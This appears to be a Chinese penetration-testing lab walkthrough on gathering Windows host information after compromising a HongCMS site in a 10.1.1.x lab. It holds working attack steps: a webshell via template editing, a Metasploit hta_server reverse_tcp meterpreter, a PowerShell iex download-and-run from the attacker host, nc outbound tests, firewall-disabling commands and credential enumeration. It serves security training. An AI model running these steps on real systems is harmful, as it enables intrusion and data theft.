[lc1]Windows Vista" 是微软（Microsoft）发布的操作系统，它是Windows XP之后的一代操作系统。

Windows主机信息收集

实验环境

目标机器：win7、IP：10.1.1.126

攻击机器：kali、IP：10.1.1.144

所需工具请在实验机内下载使用： http://tools.hetianlab.com/tools/HongCMS-tools.zip

实验步骤一

任务描述：获取目标服务器shell

目标首页：

通过对目标网站的敏感目录探测，发现存在admin目录：

访问后发现为目标网站后台：

通过手工枚举的方式用户名和密码为root:root成功进入后台：

接下来就是寻找可以getshell的点：

在模板管理处发现存在任意文件上传且允许上传php，目录也回显给我们了。

同时在语言管理处发现也可以编辑语言文件getshell：

此处我们通过修改语言模板getshell，访问后可能会报权限不足的错误，但是shell是可以运行的：

通过蚁剑连接，获取目标shell

Linux启动蚁剑：

下载工具包后解压antSword-2.1.10和AntSword-Loader-v4.0.3-linux-x64，前一个为蚁剑加载包，后一个为蚁剑主程序。进入AntSword-Loader-v4.0.3-linux-x64启动蚁剑：

这时候需要去初始化蚁剑的工作目录，选择解压后的antSword-2.1.10，然后重启蚁剑。

之后配置要连接的shell：

实验步骤二

任务描述：通过获取的webshell，进行内网信息收集

1. 首先分析进出口的流量是否能连通

协议的判断：场景的TCP、DNS、HTTP、ICMP等协议；

端口判断：外网vps做监听，内网机器测试常见端口，常见能出去的端口有80,8080,443,53,110,123；

TCP协议：

vps: nc -lvvp[lc1]  8888 

target: nc 10.1.1.144 8888 (需要通过webshell上传nc)

ICMP协议：

vps：tcpdump icmp 

target: ping 10.1.1.144

DNS协议:

vps: nc -u -lvp 53  

target :nslookup www.baidu.com 10.1.1.144

HTTP协议：nc -lvvp 80  

target： 10.1.1.144 80  (需要上传curl)

将shell反弹到msf上面，因为在webshell下不交互

use exploit/windows/misc/hta_server

msf exploit(windows/misc/hta_server) > set srvhost 10.1.1.144

msf exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcp

msf exploit(windows/misc/hta_server) > set lhost 10.1.1.144

msf exploit(windows/misc/hta_server) > set target 1

msf exploit(windows/misc/hta_server) > exploit -j

2. 用户信息收集

查看本机用户列表：net user

获取本地管理员信息：net localgroup administrators

#查看当前在线用户和会话

quser

query user

query user || qwinsta

查当前用户在目标系统中的具体权限：whoami /all

查看当前权限：whoami && whoami /priv

查当前机器中所有的组名，了解不同组的职能：net localgroup

3. 系统信息收集

查询网络配置信息，进行IP地址段信息收集：ipconfig /all

#查询操作系统及软件信息

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"   #英文系统

systeminfo | findstr /B /C:"OS 名称 " /C:"OS 版本 "    #中文系统

查看当前系统版本：wmic OS get Caption,CSDVersion,OSArchitecture,Version

查看系统体系结构：echo %PROCESSOR_ARCHITECTURE%

查询本机服务信息：wmic service list brief

查看安装的软件的版本、路径等：wmic product get name, version

powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name, version"

查询进程信息：tasklist

wmic process list brief

查看启动程序信息：wmic startup get command,caption

#查看计划任务

at （win10之前）

schtasks /query /fo LIST /v （win10）

查看主机开机时间：net statistics workstation

列出或断开本地计算机与所连接的客户端的对话：net session

查看远程连接信息：cmdkey /l

查看补丁列表：systeminfo | findstr KB

查看补丁的名称、描述、 ID、安装时间等：wmic qfe getCaption,Description,HotFixID,InstalledOn

查看杀软：WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct GetdisplayName /Format:List

查看本地密码策略：net accounts

#查看 hosts 文件

Linux：cat /etc/hosts

Windows：type c:\Windows\system32\drivers\etc\hosts

查看dns缓存：ipconfig /displaydns

4. 网络信息收集

查看本机所有的tcp,udp端口连接及其对应的 pid ：netstat -ano

查看本机所有的tcp,udp端口连接,pid及其对应的发起程序：netstat -anob

#查看路由表和arp缓存：

route print

arp -a

 #查看本机共享列表和可访问的域共享列表（445端口）

net share

wmic share get name,path,status

磁盘映射：net use k: \\10.1.1.144\c$

5. 防火墙信息收集

#关闭防火墙

netsh firewall set opmode disable (Windows Server 2003以前的版本)

netsh advfirewall set allprofiles state off（WindowsServer 2003 以后的版本）

查看防火墙配置：netsh firewall show config (netsh命令也可以用作端口转发)

查看配置规则：netsh advfirewall firewall show rule name=all

6. 代理信息收集(前提目标配置了代理，否则会报错)

REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\InternetSettings" /v ProxyServer

#通过pac文件自动代理情况

REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\InternetSettings" /v AutoConfigURL

7. Powershell脚本

FTP 访问、共享连接、 putty 连接、驱动、应用程序、 hosts 文件、进程、无线网络记录

首先在kali开启http服务：Python3 -m http.server

powershell iex(new-object net.webclient).downloadstring('http://10.1.1.144:8000/Get-Information.ps1');Get-information

8. Metasploit

Scraper模块：

Meterpreter > run scraper

/root/.msf4/logs/scripts/scraper

winenum模块：

meterpreter > run winenum

/root/.msf4/logs/scripts/winenum